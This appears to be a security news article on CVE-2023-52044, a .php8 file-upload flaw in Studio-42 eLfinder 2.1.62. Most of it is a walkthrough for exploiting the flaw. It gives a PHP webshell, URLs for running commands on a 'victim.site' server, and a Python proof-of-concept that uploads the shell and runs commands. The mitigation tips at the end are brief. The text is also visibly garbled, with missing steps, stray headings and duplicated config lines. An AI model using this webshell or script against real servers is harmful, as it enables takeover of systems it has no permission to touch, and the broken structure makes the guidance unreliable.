CVE CyberSecurity Database News

CVE-2023-52044 - Studio-42 eLfinder 2.1.62 `php8` File Upload RCE Explained and Exploited

Poster -

CVE-2023-52044 is a recently disclosed vulnerability affecting Studio-42 eLfinder version 2.1.62. This bug has critical consequences: it allows an attacker to upload PHP code with a .php8 extension, which can then be executed remotely, granting the attacker full control. Let's break down how this works, walk through how to exploit it, and provide mitigation tips.

What is Studio-42 eLfinder?

eLfinder is a popular open-source web-based file manager. It's often used within content management systems (CMSes), control panels, and other web apps to allow file browsing and uploads via a user-friendly graphical interface.

How It Happens

When a file upload is processed, eLfinder checks file extensions against an *allow* or *deny* list to block dangerous files (like .php). However, in version 2.1.62, the upload restriction does not block files with the .php8 extension. Modern PHP versions recognize .php8 files as PHP scripts, so uploading a .php8 file is just as dangerous as uploading a .php file.

*This happens because the extension filter didn't anticipate the newer phpN extension variants.*

The server runs PHP 8.x and processes .php8 files

- An account or exploit chain that allows file upload (as guest or authenticated user, depending on eLfinder config)

evil.php8

<?php
// Simple webshell
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>

2. Access eLfinder's File Upload

Go to the publicly accessible eLfinder upload form and upload evil.php8 as you would any normal file.

Uploaded files are typically stored in a web-accessible directory, like

http://victim.site/elfinder/files/evil.php8

4. Trigger Remote Code Execution

You (or an attacker) can execute commands by requesting the script via HTTP and passing a command in the URL, like:

http://victim.site/elfinder/files/evil.php8?cmd=whoami

This will execute whoami on the victim server and display the output.

Here's a basic Python PoC script that automates this exploitation

import requests

# Replace with actual URL path of eLfinder instance
url = 'http://victim.site/elfinder/php/connector.php';
upload_url = 'http://victim.site/elfinder/files/evil.php8'

# Step 1: Upload the payload (varies per eLfinder configuration)
files = {'upload[]': ('evil.php8', "<?php system($_GET['c']); ?>", 'application/x-php')}
r = requests.post(url, files=files)
print("Upload status:", r.status_code)

# Step 2: Execute command
cmd = 'id'
r = requests.get(upload_url, params={'c': cmd})
print("Command output:\n", r.text)

> Note: Adjust file paths and POST details for your specific setup.

Exfiltrate sensitive data

This makes the bug *critical* for any public installations.

References

- GitHub Issue Discussion: Studio-42 eLfinder RCE
- Original eLfinder Project
- CVE Details for 2023-52044

Restrict File Types in Config:

Manually blacklist php and all variants (php3, php4, php5, php7, php8, etc.) in the uploadDeny option.

'uploadDeny' => ['all'],

'uploadAllow' => ['image', 'text/plain', ...],

Deny from all

Deny from all

Conclusion

CVE-2023-52044 is a textbook example of why security filters need to keep up with changes in language and file extension handling. If you use eLfinder, check your version now, review your allowed extensions, and patch as soon as possible. Remember, attackers are always creative—don't let your upload filter be your weak link!

Timeline

Published on: 10/31/2024 19:15:12 UTC
Last modified on: 11/01/2024 16:35:05 UTC